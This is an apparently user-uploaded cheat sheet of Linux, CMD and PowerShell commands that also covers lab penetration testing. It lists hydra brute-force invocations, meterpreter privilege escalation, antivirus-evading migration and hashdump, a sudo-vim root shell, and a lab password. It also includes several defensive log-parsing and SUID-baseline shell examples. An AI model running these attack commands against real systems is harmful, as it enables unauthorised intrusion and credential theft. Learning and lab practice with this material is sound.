Linux cmds

This document is a comprehensive guide to various Linux commands and their functionalities, including file management, user management, network commands, and system operations. It also covers tools for penetration testing, such as Nmap, Metasploit, and Hydra, along with examples of their usage. Additionally, it provides insights into privilege escalation techniques and network monitoring with Snort and Bettercap.

Uploaded by

familbnb00

~ = /home/kali (the user's home directory; a separate folder from /)

/ - Root of the filesystem

User: kali Pass: ejgfb5 (lab VM login)

Linux cmds
Ctrl+Shift++ * Increase the terminal font size

Left Ctrl+L * Clear the screen; clear * Same, wipes everything shown

Right Ctrl+F * Leave full screen (VirtualBox host key + F)

git clone "https URL" * Download (clone) a repository from GitHub

sudo ./filepath * Run an executable file or script as root (only when root is really needed)

apt-get update * Refresh the package lists; apt-get install <pkg> * Install a program

whoami * Current username

display image * Display an image (install imagemagick)

dirbuster * Brute force directories and files under a URL

cd /usr/share/wordlists; hydra -l test -P fasttrack.txt rdp://<ip address> * Brute force RDP with one username and a wordlist

xdg-open file * Open a file (e.g. an image) with its default application from the terminal

ls * List the current directory; ls <directory> * List that directory's contents

date * Show date and time; exit * Close the terminal

pwd * Print working directory (the folder you are in)

ip addr * Show IP addresses

cd .. * Change to the parent directory (go back one level)

cd * Go to the home directory

Tab * Autocomplete commands and paths

nl * Number the lines of a file

touch * Create an empty file; mkdir * Make a directory

rmdir * Remove an empty directory

ls -la * Long list of everything (names starting with "." are hidden and do not show in plain ls)

man ls * Read a command's manual; ls --help * Short option summary

ssh username@yourIP -p 2222 * Remote shell on port 2222


echo Hi > test.txt * Writes 'Hi' into the file (quotes not needed for one word); > overwrites the file

>> * Appends instead of replacing the existing content

rm * Remove a file; rm -r * Remove a directory and its contents

cp file destination * Copy a file

cp -r source_dir destination * Copy a directory to another place

cat file1 >> file2 * Append file1 to file2 without overwriting

mv * Move or rename a file or directory

Ex: mv old_name new_name

Up arrow * Previous commands

passwd * Change your password

sudo passwd user1 * Change another user's password

ls options:

-1 * One entry per line (single column)

-r * Reverse order

-l * Long listing (size, permissions, owner; -lh for human-readable sizes)

-d * List the directory entry itself, not its contents

-S * Sort by size (-s shows the allocated size in blocks)

-p * Append / to directory names (creating parent directories is mkdir -p, not an ls option)

cat file * Print a file (.txt). Ex: cat dir8/file.txt

mousepad * Like cat, but a GUI editor

tar -xvf archive.tar * Extract .tar files

-r * Recursive. Ex: cp -r also copies the contents inside

&& * Run the second command after the first, only if the first succeeded

& * Run a command in the background if it takes long

unzip file.zip -d mydirec * Unzip into the mydirec directory

bzip2 file * Compress a file to .bz2 (for a directory, tar it first: tar -cjf dir.tar.bz2 dir)

find -name "*.txt" * Find files or directories by name (* is a wildcard; quote it so the shell does not expand it first)

grep "word" file.txt * Find a word in a file (use -r for directories); egrep = grep -E

Square brackets - a RANGE or set of single characters: m[a-d]m, m[asd]m

Curly brackets - a list: mkdir {folder1,folder2}


mkdir dir{1..100} * Create 100 directories

mkdir -p dir4/dir5 * -p creates the missing parent directories

rm -r dir{1..100} * Delete the 100 directories

rmdir * Remove an empty directory (error if not empty)

rm -r * Remove a directory and everything inside it; mkdir dir1/FM

sudo su -l * Switch to root with a login shell; sudo su -l name * Switch to user name

file name * Show the type of a file

su -l user * Switch user with a login shell (you do not stay in the old user's home directory or environment)

/etc * System configuration files

/var * Frequently changing variable data: tmp, log files, backups

/tmp * Temporary directory; scratch space; cleared on restart

/etc/shadow * File with the hashed user passwords (readable by root only)

/etc/passwd * Lists users and their shells

/etc/group * Lists groups and their members

1) python3 -m http.server 8000 * Start a web server on a free port (serves the current directory)

2) wget http://ipUrl:8000/file.txt -P /tmp/ * Download the file into /tmp, which is writable without sudo when you are not root

3) chmod +x file.sh * Make the script executable

wc -w * Word count; -l * Lines; -c * Bytes

nano filename * Edit or create a text file

Ctrl = "^" in the editor's shortcut list

Local to remote (source to destination) secure copy:

scp filename user@ip:/filelocation/newname

Remote to local:

scp user@ip:filelocation newname

kill <PID> * Kill a process by its PID

q * Quit (in less, man). PID 0 is the kernel's scheduler; PID 1 is init/systemd, the first process started at boot

systemctl start (stop, enable, disable, ...) servicename * Manage services

Ex: command & or Ctrl+Z * Run in the background / suspend the foreground job (e.g. a long copy)

fg * Bring the job back to the foreground

crontab -e * Edit the cron schedule

/var/log * Logs; ufw * Firewall logs; fail2ban * Brute-force bans

Apache access and error logs are in /var/log/apache2

less * Page through output one screen at a time instead of dumping everything

add-apt-repository * Add a package repository (repositories are configured under /etc/apt)

wget -qO - url | sudo apt-key add - * Import a repository's signing key (apt-key is deprecated; newer releases keep keys under /etc/apt/keyrings)

touch a .list file under /etc/apt/sources.list.d and add the repository line to it; apt update; apt install <pkg>

[a-c]zz * azz, bzz, czz; [a-cx-z]zz * azz, bzz, czz, xzz, yzz, zzz

[a-zA-Z] * Any letter; file[1-3]; [^k]ing * Exclude "k": ring, not king

[^a-c]at * NOT bat, cat; but fat, hat are okay

[abc] * Any one of a, b, c (a set matches a single character)

. * Any single character: ".at" - cat, fat, hat, rat

\ + char * Escape a special character. For a literal dot: a\.c matches a.c

? * Optional character: abc? - ab or abc ('c' is optional)

* * Zero or more times: cats* = cat, cats, catsss; a.*f = acf, awerf

+ * One or more times: o+ = o, oo, ooo

grep -E 'e+' red.txt * Matches red, reef, reeed

\d * Digit; \D * Non-digit (Perl syntax, grep -P; with grep -E use [0-9] or [[:digit:]])

\w * Word character: letters, digits, underscore; \W * Non-word character: !, #

\s * Whitespace (space, tab, newline); \S * Non-whitespace

{12} * Exactly 12 times; {1,5} * 1 to 5 times; {2,} * 2 or more

^ * Starts with (inside [ ] it means exclude); $ * Ends with

^abc * Starts with abc; xyz$ * Ends with xyz

^a.*r$ * Starts with 'a' and ends with 'r'

^...$ * Exactly 3 characters

(day|night) * Alternation: "the day" or "the night"
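The character classes, quantifiers and anchors above, applied to something a pentester actually does with them: pulling IPv4 addresses out of log text and then deciding whether each one is real. This is an added example, not part of the original notes; the log lines are constructed and the function names are my own. It shows why a search pattern (grep -Eo, unanchored) and a validation pattern (^...$, plus a per-octet range check, because [0-9]{1,3} happily accepts 999) are two different things.

```shell
# Added example (not from the original notes). Sample text is constructed.
set -u

SAMPLE_LOG='Failed password for root from 203.0.113.45 port 51422 ssh2
Accepted publickey for kali from 10.0.0.7 port 50000 ssh2
bogus address 999.1.2.3 and version 1.2.3.4.5 and host 10.0.0'

# extract_ipv4 TEXT: print every dotted-quad-looking token, one per line.
# {1,3} and \. are the quantifier and escaped dot from the notes;
# -o prints only the matching part, so "1.2.3.4.5" yields "1.2.3.4".
extract_ipv4() {
    printf '%s\n' "$1" | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}'
}

# is_valid_ipv4 TOKEN: exact match (^ ... $) of four octets, then each
# octet checked to be <= 255. The shape check alone accepts 999.1.2.3,
# and without the anchors "1.2.3.4.5" would pass as well.
is_valid_ipv4() {
    printf '%s\n' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    local octet
    for octet in $(printf '%s\n' "$1" | tr '.' ' '); do
        [ "$octet" -le 255 ] || return 1
    done
}

# valid_ips_in TEXT: extracted tokens that also pass validation.
valid_ips_in() {
    extract_ipv4 "$1" | while read -r ip; do
        is_valid_ipv4 "$ip" && printf '%s\n' "$ip"
    done
}

# valid_ips_in "$SAMPLE_LOG" prints 203.0.113.45, 10.0.0.7 and 1.2.3.4;
# 999.1.2.3 is extracted but rejected by the range check.
```

Use the extractor on untrusted input only as a first cut; anything that later ends up in a firewall rule or a ban list should go through the anchored validator.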


updatedb * Refresh the locate database if a new file does not show up

chmod +rwx file * Change permissions on the file (adds read, write, execute)

chmod 777 * Full permission for everybody (owner, group, others); avoid it, anyone on the box can modify and run the file

sudo useradd -g blue -G purple -s /bin/bash ME * Create user ME with primary group blue, extra group purple and bash as shell

sudo adduser (useradd, addgroup) name * Add a user or group

sudo userdel john * Delete a user

grep 'sudo' /etc/group * See the members of the "sudo" group, i.e. who can use sudo

du -ah /home/ * Disk usage, folders and files by size (-a = all files, -h = human readable)

du -c * Grand total; du --time * Show last modification time

egrep = grep -E * Extended regex: |, +, ?, {} work without backslashes

grep -F = fgrep * Search for a fixed string, not a regex

grep * Basic regex; egrep * Extended regex

grep -v * Lines NOT containing the pattern; -R * Recursive through directories

grep -i * Ignore case

tr -s (translate; squeeze) * Replace characters of the source set with the destination set and squeeze repeats (character sets, not words). Ex: cat file.txt | tr '[a-z]' '[A-Z]' * Lowercase to uppercase. tr -s ' ' * Squeeze repeated spaces into one

tr -d 'set' * Delete the characters in the set

tr -d 'character' < file.txt > newfile.txt * Delete the character and write the result to a new file

[:digit:] * Digits

[a-zA-Z] * All letters

awk '{print}' = cat; awk '/ctf/' file.txt * Print the lines containing "ctf"

awk '{print $1,$3}' file.txt * Print the 1st and 3rd field of every line

awk '{print NR,$0}' file.txt * Number the lines (NR = record number)

$0 = the whole line. Fields are the pieces before and after each separator (whitespace by default)

awk 'BEGIN{FS="o"} {print $1,$3} END{print "TOTAL ROWS= " NR}' file.txt * Use the letter "o" as field separator, print fields 1 and 3, and the total number of lines at the end

sort * Sort alphabetically; sort -n -r * Numerically, in reverse (largest to smallest)

sort -o save.txt * Save into an output file

uniq * Eliminates duplicate lines, but only adjacent ones, so sort first

sort | uniq * Sort alphabetically, then eliminate duplicates

uniq -c * Count the occurrences of each line

uniq -d * Show only repeated lines; uniq -u * Show only lines that occur once

head -n 2271 sort.txt * Show the first 2271 lines (line 2271 is the last one printed; pipe into tail -n 1 to get only it)

cut -d ":" -f 1 * Delimiter is colon, take the first field (usernames from /etc/passwd for brute forcing)

cat -n * Number the lines
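The awk / sort / uniq -c / sort -rn chain above is the standard way to find who is hammering a login service, and cut -d ":" -f 1 on /etc/passwd is how the user list for a password attack is built. Here is both put to work, as an added example that is not part of the original notes: the auth log lines and the passwd excerpt are constructed, and the function names and the failure threshold are my own choices. The second function also drops accounts whose shell is nologin or false, since those cannot log in and only waste attempts.

```shell
# Added example (not from the original notes). All sample data is constructed.
set -u

AUTH_LOG='Mar  1 10:00:01 box sshd[1001]: Failed password for root from 203.0.113.45 port 51422 ssh2
Mar  1 10:00:02 box sshd[1002]: Failed password for invalid user admin from 203.0.113.45 port 51423 ssh2
Mar  1 10:00:03 box sshd[1003]: Failed password for root from 203.0.113.45 port 51424 ssh2
Mar  1 10:00:04 box sshd[1004]: Accepted publickey for kali from 10.0.0.7 port 50000 ssh2
Mar  1 10:00:05 box sshd[1005]: Failed password for root from 198.51.100.9 port 40000 ssh2'

# failed_logins_by_ip LOGTEXT: "ip count" per source IP, largest count first.
# awk prints the field after "from" (position varies because of "invalid user");
# sort | uniq -c counts adjacent duplicates, so sort must come first;
# sort -rn orders by the leading count; the last awk swaps the columns.
failed_logins_by_ip() {
    printf '%s\n' "$1" \
      | awk '/Failed password/ { for (i = 1; i <= NF; i++) if ($i == "from") print $(i+1) }' \
      | sort | uniq -c | sort -rn \
      | awk '{ print $2, $1 }'
}

# brute_force_sources LOGTEXT THRESHOLD: IPs with at least THRESHOLD failures.
brute_force_sources() {
    failed_logins_by_ip "$1" | awk -v t="$2" '$2 >= t { print $1 }'
}

PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
kali:x:1000:1000:kali:/home/kali:/usr/bin/zsh
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
svc:x:1001:1001::/home/svc:/bin/sh'

# login_accounts PASSWDTEXT: usernames (field 1) whose shell (field 7, the
# last one) is not nologin or false. grep -Ev with a $ anchor removes the
# rest before cut takes the first colon-separated field.
login_accounts() {
    printf '%s\n' "$1" | grep -Ev ':(/usr/sbin/nologin|/bin/false)$' | cut -d ':' -f 1
}

# failed_logins_by_ip "$AUTH_LOG" -> "203.0.113.45 3" then "198.51.100.9 1"
# brute_force_sources "$AUTH_LOG" 3 -> 203.0.113.45
# login_accounts "$PASSWD" -> root, kali, svc
```

On a real box replace the variables with `cat /var/log/auth.log` and `cat /etc/passwd`; the pipelines do not change.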

env * Show environment variables and PATH (may reveal an installed scripting language)

ifconfig * Show network interfaces, IPs etc.

netstat -at or -au * List TCP or UDP connections; netstat -s * Statistics

pdfinfo doc.pdf * Metadata of a PDF (author, times)

sudo apt install poppler-utils * Installs pdfinfo on Kali

exiftool image.jpg * GPS, camera model (replace "deg" with '°' and paste into Google or Bing Maps)

sudo apt install libimage-exiftool-perl * Installs exiftool

ftp <ip address> * Connect to an open FTP port

get file [new name] * Download from the open FTP server

sha256sum file * SHA-256 hash of the file

md5sum file * MD5 hash (fine for spotting accidental corruption, too weak to trust against tampering)
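The three-step transfer above (http.server, wget into /tmp, chmod +x) has a gap: nothing checks that what arrived is what was served before it is made executable. Here is the missing check built from sha256sum and cut as an added example, not part of the original notes. To keep it runnable offline, the download is replaced by a locally written file; the function names and the sample script are mine. The expected digest would normally come from the serving side (sha256sum on the original file, read out of band).

```shell
# Added example (not from the original notes). File contents are constructed.
set -u

# verify_and_mark_executable FILE EXPECTED_SHA256
# Returns 0 and sets +x only when the full 64-hex SHA-256 matches;
# returns 1 and leaves the mode untouched otherwise.
verify_and_mark_executable() {
    local file="$1" expected="$2" actual
    [ -f "$file" ] || { echo "missing: $file" >&2; return 1; }
    actual=$(sha256sum "$file" | cut -d ' ' -f 1)   # digest is the first field
    if [ "$actual" != "$expected" ]; then
        echo "hash mismatch for $file: got $actual, expected $expected" >&2
        return 1
    fi
    chmod +x "$file"
}

# demo: write a stand-in for the downloaded script, try a wrong digest
# first (must be refused and must NOT become executable), then the right one.
demo() {
    local dir script good bad rc
    dir=$(mktemp -d)
    script="$dir/tool.sh"
    printf '#!/bin/sh\necho hello from tool\n' > "$script"
    good=$(sha256sum "$script" | cut -d ' ' -f 1)
    bad=0000000000000000000000000000000000000000000000000000000000000000
    if verify_and_mark_executable "$script" "$bad"; then
        echo "unexpected: wrong hash accepted" >&2; rm -rf "$dir"; return 1
    fi
    if [ -x "$script" ]; then
        echo "unexpected: file became executable on mismatch" >&2; rm -rf "$dir"; return 1
    fi
    verify_and_mark_executable "$script" "$good" || { rm -rf "$dir"; return 1; }
    "$script"            # now runs: prints "hello from tool"
    rc=$?
    rm -rf "$dir"
    return $rc
}
```

Compare the whole digest, never a prefix, and take the expected value from somewhere the attacker who could tamper with the transfer cannot also edit.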

echo "code" | base64 -d * Decode base64

sudo su * Become root

find / -iname "filename" 2>/dev/null * Find a file's path starting from root (ignore case); errors go to /dev/null

find . -name flag.txt * Find the file under the current directory

find / -type f -perm 0777 * Files with exactly 777 permissions (-type d * Directories)

find / -size +100M * Files larger than 100 MB

cat /etc/issue * Linux distribution and version; cat /proc/version * Kernel version of the target system

netdiscover -r <range> * Find IP addresses on the network

hashcat -O -m 20 --show salted_hash /usr/share/wordlists/rockyou.txt * -O optimized kernels, -m the hash mode number (see hashcat --help; 20 is md5($salt.$pass)), --show prints passwords already cracked in the potfile

gobuster dir -u http://10.10.. -w wordlist/path * Brute force directories on a web server

hydra -l username -P passwordlist/path -t 6 10.10... ssh (or ftp://ip) * Brute force the SSH password with 6 parallel tasks

hydra -l username -P rockyou.txt ip.address (no slashes) http-post-form "/login:user=^USER^&pass=^PASS^:invalid" * Brute force a login page; the last field is the text the page returns on a failed login

crunch 7 9 abc6543 * Make a wordlist with lengths 7 to 9 from the characters abc6543

Nmap

nmap -F -A -T4 -sC <ip address> * Fast scan of the most common ports, -A for OS and version detection (-sV), -T4 faster timing, -sC default scripts (-sN is a TCP Null scan, not a network scan; give a range like 10.10.0.0/24 to scan a network)

nmap -sV -vv -sC --script vuln -sS * Version scan, very verbose, default scripts plus the vuln script category, SYN scan (-sS is the half-open "stealthy" scan; most IDS still log it)

If port 80 (http) or 443 (https) is open there is a web server running, mostly hosting websites under different /paths

Check the versions of the web applications on the websites

Searchsploit (Exploit database)

searchsploit --cve 2019-9053 * Search exploit-db for an exploit by CVE (example CVE)

searchsploit -m <file path> * Mirror (copy) the exploit to your machine

python3 /usr/share/exploitdb/exploits/<searchsploit file location> http://..:port/ * Run the exploit

Metasploit (after nmap and gobuster)

msfconsole * Start Metasploit

search (name) * Search for the service or vulnerability found with nmap

use (number) * Select the exploit

back * Leave a wrongly chosen module

show options * See what is required and what is not

set RHOSTS ip * Set the required values

Ctrl+Z or background * Background the session

search shell_to_meterpreter, then use 0 and show options

set SESSION id, then run; sessions * List sessions

sessions -i id * Interact with the meterpreter session

Meterpreter: 1) getsystem * Try to escalate to SYSTEM (getuid to confirm), 2) shell * Open a DOS/OS shell, which shows the file path on Windows or any OS, 3) whoami, 4) (after Ctrl+Z) ps * List processes, 5) migrate <PID> * Migrate into an NT AUTHORITY\SYSTEM process to evade antivirus and keep privileges, 6) hashdump * Extract Windows password hashes (migrate to another SYSTEM process if it does not work)

Other meterpreter commands: search -f file (when pasting a path use double backslashes, or Tab-complete instead of typing it by hand); ? * Help; dir * List, on Windows; type = more * See content (cat); getuid * See privileges; sessions -i id * Get back to a session; cat "path to file" * Quote Windows paths in Linux; sysinfo * Computer and OS name; pwd; cd ../../

Privilege Escalation

Use linux-exploit-suggester

sudo vim -c ':!/bin/sh' * Spawn a shell from vim when sudo allows vim; inside vim press Esc to return to normal mode and type :!cmd to run commands

sudo -l * See what you may run with sudo; also check the other users in the home directory

Go to gtfobins.github.io and look up the binaries from sudo -l that can be used to escalate

find / -perm -4000 2>/dev/null * Find files with the SUID bit; 2>/dev/null hides the errors
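The SUID search above, and the find -perm 0777 / chmod 777 entries earlier, are more useful when the result is compared against what the box looked like before: the interesting finding is the SUID binary that was not there yesterday, or the world-writable script that root runs. Here is that comparison as an added example, not part of the original notes. The directory tree is built under mktemp so it runs without root; the planted file names and the baseline are invented.

```shell
# Added example (not from the original notes). The tree and baseline are constructed.
set -u

# suid_files DIR: regular files with the setuid bit, sorted.
# -perm -4000 means "this bit set, other bits don't matter" (mode 4xxx);
# 2>/dev/null hides "Permission denied" noise, as in the notes.
suid_files() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# world_writable_exec DIR: files both writable and executable by everyone.
# Two single-bit tests; -perm 0777 (no dash) would only match exactly 777.
world_writable_exec() {
    find "$1" -type f -perm -0002 -perm -0001 2>/dev/null | sort
}

# new_suid_since BASELINE_FILE DIR: SUID files not listed in the saved baseline.
# Both inputs are sorted; comm -13 prints lines only in the second (current) one.
new_suid_since() {
    suid_files "$2" | comm -13 "$1" -
}

# make_demo_tree: a known SUID "passwd", a planted SUID backup script,
# a harmless non-executable file and a 777 script. Prints the root path.
make_demo_tree() {
    local root
    root=$(mktemp -d)
    mkdir -p "$root/usr/bin" "$root/opt/backup"
    printf '#!/bin/sh\n' > "$root/usr/bin/passwd";    chmod 4755 "$root/usr/bin/passwd"
    printf '#!/bin/sh\n' > "$root/opt/backup/run.sh"; chmod 4755 "$root/opt/backup/run.sh"
    printf '#!/bin/sh\n' > "$root/opt/backup/notes";  chmod 0644 "$root/opt/backup/notes"
    printf '#!/bin/sh\n' > "$root/opt/open.sh";       chmod 0777 "$root/opt/open.sh"
    printf '%s\n' "$root"
}

# Typical use on a real host:
#   suid_files / > suid.baseline            (once, on a clean system)
#   new_suid_since suid.baseline /          (later: only the additions)
#   world_writable_exec /                   (candidates for planting code root will run)
```

The baseline has to be stored somewhere the attacker cannot rewrite, otherwise the comparison proves nothing; the same holds for the copy of the SUID list you carry off a target during an engagement.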

Enumeration:

hostname * Name of the machine (often hints at the OS or role)

uname -a * Info about the kernel

ps -axjf * View the process tree

ps aux * All users' processes and who launched them

ps aux | grep -v tty * Hide processes attached to a terminal, i.e. show background and service processes

id [name] * Show your own or another user's uid, gid and groups; also check whether you are root

history * See command history

gedit local.rules * Edit Snort rules

sudo snort options: -X * Dump packets as raw hex + ASCII (similar to -dev; use with -r or -c); -d * Logger mode, dump all packet payloads; -A full * Generate full alerts; -c * Specify the config/rules file; -r * Read pcaps or snort logs; -T * Test the config and rules (with -c); -l . * Log output to the current directory

IPS mode: sudo snort -c file -q -Q --daq afpacket -i eth0:eth1 -A full

sudo snort -r snort.log 'port 22' * Read the snort log and filter port 22 (BPF filter)

/etc/snort/rules/local.rules * Local rules file

tail | head file * Last | first 10 lines of the file

route = ip route * See the routing table (and who shares your network, from the /prefix)

ip a * See your IPs on the network

iwconfig * See wireless interfaces

service apache2 start * Start the Apache server

Bettercap:

1st cmd: bettercap

net.probe on * Scan for devices on the network; net.show * See the devices

CMD:
ipconfig /? * Help for a command

cls * Clear the screen

net user (username) * List users; with a name, their groups and last logon

color 2 (3, 4, ...) * Change console colours; dir /s * Recursive directory listing

arp -a * IPs with their MACs on the same network

PowerShell: (Verb-Noun)
cd C:\

Get-Command; Get-Alias (different) * See cmdlets and their aliases

Get-Command Verb-* or Get-Command *-Noun (wildcards)

Get-Help command-name * Get help

Get-Service | Where-Object -Property Status -eq Stopped * Services whose status is Stopped

ls -Path C:\ -Include *file.txt* -File -Recurse -ErrorAction SilentlyContinue * Find files (not directories)

Get-Content "C:\.." * Cat files

Get-FileHash -Algorithm MD5 FILEPATH

Get-ChildItem | Select-Object -Property Mode,Name

Set-Location C:\ = cd \ * Go to the root of the C: drive

Get-ChildItem = dir = ls * List

Set-Location * Like cd, change directory

Get-Location * pwd, the directory you are in

Copy-Item * cp

New-Item filename.txt * Create a file

echo "smth" (Write-Output)

Remove-Item = rm = rmdir = del = rd

Clear-Host = clear = cls * Clear the screen

notepad, calc * Calculator, mspaint

ipconfig /all

Get-Help *resolve* * Wildcards work in Get-Help too
